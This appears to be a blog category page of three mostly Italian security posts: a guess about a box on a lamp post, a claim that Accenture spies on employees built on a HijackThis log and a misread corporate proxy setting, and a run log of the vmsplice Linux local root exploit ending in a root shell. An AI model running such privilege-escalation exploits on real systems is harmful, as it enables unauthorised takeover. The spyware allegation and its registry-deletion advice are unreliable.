sicurezza



NSA Snowden, spie, ma che cos'é questo scatolotto misterioso attaccato al palo della luce?

|

In questo periodo di spie americane dell' NSA del caso Snowden, forconi e rivoluzioni varie vi voglio parlare dello scatolotto.

Questo scatolotto è apparso per circa 3 settimane a un palo dell'illuminazione pubblica e subito mi ha ricordato il DNA Spray che c'é in Olanda. Ma essendo in Italia non è stato indicato con nessun cartello né cosa fosse e né ci l'avesse messo.

Caratteristiche

Scatola di materiale plastico delle dimensioni di una tanica di benzina, con sopra una specie di antenna a tre punte e una sfera ricoperta di materiale spugnoso (microfono?).

Ipotesi

L'oggetto si trovava a circa 200m dalla stazione dei treni di Grugliasco quindi potrebbe essere:

  • un microfono dell' ARPA per misurare l'impatto del rumore dei treni sulle case vicine.
  • un misuratore di particelle inquinanti (visto che in linea d'aria si vede anche l' inceneritore / termovalorizzatore del Gerbido).

Voi che dite?


Does Accenture Spy its employees?

| |

Accenture is a big Consultancy Corp., it's strength is the Privacy 90 rule which should protect the customers and the employees privacy but is it really so?



I feel a bit worried because in the default PC Configuration Accenture monitors its employees' PCs
Here's the proof:

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at XXX
Platform: Windows 7  (WinNT 6.00.XXXX)
MSIE: Internet Explorer v8.00 (8.00.XXXX.16600)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Microsoft Office Communicator\communicator.exe
C:\Program Files (x86)\PC Connectivity Solution\Transports\NclMSBTSrvEx.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=6666666
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=6666666
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=6666666
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=6666666
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=6666666
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = http://set-proxy.accenture.com/bin/setup.proxy
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: AcroIEHelperStub - {18DF081C-D8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80064-A445-435b-BC74-9C25C1C58879} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [Communicator] "C:\Program Files (x86)\Microsoft Office Communicator\communicator.exe" /fromrunkey
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - Global Startup: Dell System Manager.lnk = C:\Program Files\Dell\Dell System Manager\DCPSysMgr.exe
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~2\MICROS~1\Office12\EXCEL.EXE/3000
O9 - Extra button: Invia a OneNote - {2660000A-7350-4f3c-8081-5763EE0C6C49} - C:\PROGRA~2\MICROS~1\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: I&nvia a OneNote - {2660000A-7350-4f3c-8081-5763EE0C6C49} - C:\PROGRA~2\MICROS~1\Office12\ONBttnIE.dll
O9 - Extra button: Research - {91780B25-18CC-41C8-B9BE-3C9C571A8262} - C:\PROGRA~2\MICROS~1\Office12\REFIEBAR.DLL
O15 - ESC Trusted Zone: *.nbrxp1000
O15 - ESC Trusted Zone: http://*.nbrxp1011
O15 - ESC Trusted Zone: http://*.nbrxp1023
O15 - ESC Trusted Zone: http://www.wise.com
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = dir.svc.accenture.com
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = dir.svc.accenture.com
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: SearchList = dir.svc.accenture.com,svc.accenture.com,accenture.com
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = dir.svc.accenture.com
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: SearchList = dir.svc.accenture.com,svc.accenture.com,accenture.com
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: SearchList = dir.svc.accenture.com,svc.accenture.com,accenture.com
O23 - Service: Accenture Mobile Media Reminder Service - Accenture - C:\Program Files\Accenture\Mobile Media Reminder\MobileMediaReminderService.exe
O23 - Service: Andrea ST Filters Service (AESTFilters) - Andrea Electronics Corporation - C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_58c4996fb11201dd\AESTSr64.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Dell System Manager Service (dcpsysmgrsvc) - Dell Inc. - C:\Program Files\Dell\Dell System Manager\DCPSysMgrSvc.exe
O23 - Service: DSM CM Inventory Agent (dsiasrv) - Dell Inc. - C:\Program Files (x86)\Dell\SysMgt\dsia\bin\DsiaSrv32.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Iap - Dell Inc. - C:\Program Files\Dell\OpenManage\Client\Iap.exe
O23 - Service: FF Install Filter Service (InstallFilterService) - Unknown owner - C:\Program Files (x86)\STMicroelectronics\AccelerometerP11\InstallFilterService.exe
O23 - Service: iPassConnectEngine - iPass, Inc. - C:\Program Files (x86)\iPass\iPassConnect\iPassConnectEngine.exe
O23 - Service: iPassPeriodicUpdateApp - iPass, Inc. - C:\Program Files (x86)\iPass\iPassConnect\iPassPeriodicUpdateApp.exe
O23 - Service: iPassPeriodicUpdateService - iPass, Inc. - C:\Program Files (x86)\iPass\iPassConnect\iPassPeriodicUpdateService.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: ServiceLayer - Nokia - C:\Program Files (x86)\PC Connectivity Solution\ServiceLayer.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Audio Service (STacSV) - IDT, Inc. - C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_59b4996fb11201dd\STacSV64.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: DW WLAN Tray Service (wltrysvc) - Dell Inc. - C:\Program Files\Dell\DW WLAN Card\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 8754 bytes

What Does it mean?

Everytime You visit a website with a web browser (yes not only Internet Explorer) an Accenture Proxy Server (http://set-proxy.accenture.com) is informed (hijacking the requests) and with some browsers you can also see it if You have a quick eye..

HELLO WORLD!!! 
This is CTCPX4101 Production.

How to fix it?

To remove this kind of spyware You have to type "regedit" and remove or renames that keys in the Windows Registry

EFF help us! And if You are an Accenture employeer I wouldn't sleep so quitly . OMG! this useless spyware proxy runs since 2005 it is still there and it could also produce errors in certain configurations.. I can't believe and risk


vmsplice mi buca sia Feisty che Hardy :(

| |

utente@pc01:~/sources$ gcc vmsplice.c -static -Wno-format  -o vms
utente@pc01:~/sources$ ./vms
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f4b000 .. 0xb7f7d000
[+] root
root@pc01:~/sources# whoami

Una volta fatto il binario potete utilizzarlo anche su altre macchine, a patto che l'architettura sia la stessa.

Se siete maniaci della sicurezza (o haxor) date uno sguardo a Metasploit si tratta di un framework per testare i vari exploit. Un video autoesplicativo su milw0rm


Syndicate content